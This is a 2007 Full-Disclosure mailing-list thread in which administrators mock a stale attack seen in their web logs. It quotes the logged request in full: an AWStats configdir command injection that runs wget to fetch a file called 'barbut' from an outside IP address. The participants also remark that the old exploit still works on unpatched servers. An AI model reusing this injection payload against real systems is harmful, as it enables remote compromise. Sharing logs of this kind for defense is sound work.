Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Aleksandar Nikolic (anikolicphearless.org)
Date: Wed Nov 21 2007 - 18:40:41 CST
Now , I can`t read japanese but this looks similar
also , this http://forums.techarena.in/showthread.php?t=856173
related to this
all pretty recent ,
as i can see now , that barbut file is mising from the server in your post ,
On Wednesday 21 November 2007 09:44:25 pm Simon Smith wrote:
> Got that right... this vulnerability was released ages ago if memory
> serves right. Whats funny is that I am not using a linux host and I do
> not use awstats anyway... makes the attack even more pathetic.
> Valdis.Kletnieksvt.edu wrote:
> > On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said:
> >> Anyone else seen these really 3l337 attacks?
> >> GET
> >> /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut;
> >> gotta love script kids...
> > The truly sad part is that the script apparently still works often enough
> > that the script kids are still using it, rather than saying "that one's
> > crap, it never gets me a box".
> > One has to wonder what level of pwnage exists on boxes that are *still*
> > vulnerable to this one - they may actually be reaching win98-style
> > equilibrium. They're old enough that everybody's hit them already, and
> > are probably running software *so* ancient that it's actually before most
> > of the current crop of vulnerabilities were discovered.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/